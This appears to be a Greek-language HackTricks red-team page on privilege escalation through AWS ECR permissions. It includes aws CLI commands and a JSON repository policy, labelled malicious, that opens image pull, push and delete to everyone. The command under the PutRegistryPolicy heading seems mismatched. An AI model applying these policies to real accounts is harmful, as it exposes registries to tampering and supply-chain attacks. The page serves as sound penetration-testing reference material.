AWS - ECR Privesc

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

Ένας επιτιθέμενος με τις άδειες ecr:GetAuthorizationToken και ecr:BatchGetImage μπορεί να συνδεθεί στο ECR και να κατεβάσει εικόνες.

Για περισσότερες πληροφορίες σχετικά με το πώς να κατεβάσετε εικόνες:

AWS - ECR Post Exploitation

Πιθανές Επιπτώσεις: Έμμεση ανέλεγκτη προνομιούχος πρόσβαση με την παρεμπόδιση ευαίσθητων πληροφοριών στην κίνηση.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

Ένας επιτιθέμενος με όλες αυτές τις άδειες μπορεί να συνδεθεί στο ECR και να ανεβάσει εικόνες. Αυτό μπορεί να είναι χρήσιμο για την ανέλεγκτη προνομιούχο πρόσβαση σε άλλα περιβάλλοντα όπου χρησιμοποιούνται αυτές οι εικόνες.

Για να μάθετε πώς να ανεβάσετε μια νέα εικόνα/ενημερώσετε μια υπάρχουσα, ελέγξτε:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Όπως και η προηγούμενη ενότητα, αλλά για δημόσιους αποθετήρια.

ecr:SetRepositoryPolicy

Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να αλλάξει την πολιτική του αποθετηρίου για να χορηγήσει στον εαυτό του (ή ακόμα και σε όλους) πρόσβαση ανάγνωσης/εγγραφής. Για παράδειγμα, σε αυτό το παράδειγμα δίνεται πρόσβαση ανάγνωσης σε όλους.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Περιεχόμενα του my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Όπως και στην προηγούμενη ενότητα, αλλά για δημόσια αποθετήρια. Ένας επιτιθέμενος μπορεί να τροποποιήσει την πολιτική του αποθετηρίου ενός δημόσιου αποθετηρίου ECR για να χορηγήσει μη εξουσιοδοτημένη δημόσια πρόσβαση ή για να αναβαθμίσει τα δικαιώματά του.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη δημόσια πρόσβαση στο δημόσιο αποθετήριο ECR, επιτρέποντας σε οποιονδήποτε χρήστη να ανεβάσει, να κατεβάσει ή να διαγράψει εικόνες.

ecr:PutRegistryPolicy

Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να αλλάξει την πολιτική του αποθετηρίου για να χορηγήσει στον εαυτό του, στον λογαριασμό του (ή ακόμα και σε όλους) πρόσβαση ανάγνωσης/εγγραφής.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated